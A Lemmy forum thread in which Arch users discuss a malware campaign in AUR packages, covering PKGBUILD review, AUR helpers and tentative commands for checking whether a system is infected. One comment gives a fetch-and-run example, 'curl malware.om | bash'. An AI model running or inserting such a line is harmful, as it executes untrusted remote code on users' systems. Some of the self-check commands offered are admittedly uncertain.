A community for everything relating to the GNU/Linux operating system (except the memes!)
Also, check out:
Original icon base courtesy of lewing@isc.tamu.edu and The GIMP
Ah yes, review the PKGBUILD for every AUR update. Luckily I do this while I'm rereading the ToS every time those get changed for all my software as well.
When I finish that I intend to read the changelog in git for each of the commits since the last update.
I always check with my contract lawyer before installing or updating from the AUR. It's worth it for me.
yikes, I'm glad I decided to switch to debian stable recently, not that it's a foolproof system either
Yeah, it seems like these sort of problems aren't necesarily due to an insecure system like the AUR but moreso because of the target's publicity and popularity which is definitely the case with the rise of CachyOS.
Here’s a incomplete list:
https://gr.ht/aur_pkg_list.txt
I know some on Lemmy here use the RuneScape launcher.
For an automated script to help you check, you can use https://github.com/lenucksi/aur-malware-check to see if you're infected.
Very useful, thanks.
Came up clear, fortunately.
Out of curiosity, did Arch send any notifications through pacman or anything? The first I heard of this was on Lemmy.
I haven't seen anything through pacman though
Yeah…
Im just thinking: I was just doing my usual Linux things, and happened to not be on a Lemmy binge, I wouldn’t have seen this. I barely missed it, but could have been infected and had no idea.
I miss the browser, but luckily I haven't played RS since the new CEO cancelled new Pride Events right after the Trump Admin was reelected.
God, even the Arch malware uses npm as a vector. And thus, my hatred of npm deepens even further
Tbf, it is run in package post install section so it could be anything even the typical "curl malware.om | bash". There is a new wave of attacks now pulling things in with Bun which i guess is similar thing to NPM
I'm just a web guy whose tired of installing 10 xetabytes of 2 line libraries every time I wanna check out anything web related
Hilarious that it's JavaScript again, truely npm, pypi and cargo are obvious targets. Also, guys, minimise your usage of the AUR! I don't use any AUR packages.
Core > Extra > flathub >>>>>>>>>>>>> AUR
Not that core/extra/flathub can't be pwned but it's harder then the AUR.
I'm interested why flathub > AUR? I try to minimize AUR usage but always assumed it's better than flathub?
Not the one you asked, but it's a case of priorities:
What can be done to prevent this from happening to the AUR?
The AUR is unsafe by design. It's not intended to be something you just install from willy-nilly. It's intended to be a helpful way for arch users who know what they're doing to exchange a convenient way to install arbitrary packages. But you should always be just as wary of it as copy/pasting shell code from a random person on the internet.
The way to prevent it is to get more stuff into the official repos so people aren’t forced to rely on AUR in the first place.
It depends. There are trusted well known packages and those can be trusted in my opinion. But I wouldn't install any random package someone made.
And how would moving the packages into official repo solve anything? The reason it's in the AUR is because the arch maintainers don't have time to maintain packages.
in theory? getting rid of paru and friends, manually reviewing the pkgbuild and the source of whatever it is installing
realistically? nothing. the AUR is a glorified repository of build scripts anyone can upload. the script or the package itself can ship malware
the AUR is mostly the same as downloading and running random exes on windows. you should avoid it, make it as manual as possible (forcing you to double check what's happening) and be able to review the installer/package or trust someone who can vouch for its safety
paru shows you the PKGBUILD diffs on upgrade, so you can review then and deny upgrades.
But realistically I am not going to go into the code itself on my installed packages to check for malware or other types of attacks. That's too time consuming for my risk level, and requires more knowledge than can be expected, to be honest.
Edit: but maybe you're talking about when first installing a package? Come to think of it, I'm not sure it shows the PKGBUILD at that point. 🤔
the diff is noise in the potentially big update log. the point of doing it manually is forcing you to take your time and verify stuff one by one. also pkgbuild is just one place, seeing the hash changed means nothing if you don't check what that archive contains, or seeing the install steps don't change mean very little when the installer invokes other scripts anyway
i understand that you aren't going to vet the source itself, but at that point you are exposing yourself to this kind of malware without mitigation. the aur is unsafe by design (fast way to publish a package without any involvement from anyone else) and should be avoided whenever possible. im not an arch hater, i too run arch
It does, the diff shows the full files.
The AUR is kind of a trap. It can be useful but it has the warnings it has for a reason. Maintainers are not vetted so you depend on them both to be benevolent and competent and neither are reliable.
No one should really use it without taking the time to understand pkgbuild but you have people recommending AUR helpers like yay and tying AUR updates to regular system updates which is a terrible idea
paru always shows you the diff of the PKGBUILD on upgrade, so no need to worry about adding it to an alias that does both.
In fact, just running paru is the same as running
pacman -Syu
paru -Sau
At the end I review the PKGBUILDs and make sure everything looks reasonable. Usually it's just new source hashes, but not every time.
Trying to escape surveillance capitalism while installing aur packages willy-nilly.
Are you one of the malicious actors? Thats some shit I'd expect to hear from the people doing this, trying to justify the attack by blaming the users for "capitalism".
I am quite confused by your assumptions. I am just making a joke about people trying to avoid surveillance capitalism tools on one side and gleefully installing aur packages from random people on the other side, potentially making their surveillance exposure worse. I'm part of them some time because it's too hard to verify everything everytime.
I tend to be a little antsy around anti-capitalists. Too many bad run-ins with Tankies.
i can empathize with those infected but it's important to note that the source of this issue is still installing random stuff from random people. the aur is not the same as arch repos, and users wanting to opt in need to take more precautions than usual
~~Users can check if they're already compromised with pacman -Q | grep alvr I think maybe?~~ EDIT: No, sorry, alvr was just one of countless affected packages. Also, several is an understatement since a huge number of packages are affected.
Post with more information here: https://lists.archlinux.org/archives/list/aur-general@lists.archlinux.org/thread/FGXPCB3ZVCJIV7FX323SBAX2JHYB7ZS4/
Oh my, I'm new to Linux and I use CachyOS for my gaming rig at home. Most of the time I have no idea what I'm doing, but shit runs well and I'm happy about it. But how the hell do I check my noob ass if it's compromised?!
I'm not real clear on if this is the case but you could try:
Have you installed or updated from the AUR before, such as with Yay? Specifically after June 5th? If so, check this list or the post above for a list of compromised packages. https://gr.ht/aur_pkg_list.txt
Maybe pacman -Q | grep atomic-lockfile because that appears to be what the threat actor is installing but I'm not really sure if that's how it works...?
EDIT: If you really want to play it safe then you could try yay -R $(pacman -Qmq) to remove every aur package and wait out the storm, just be careful to backup important files.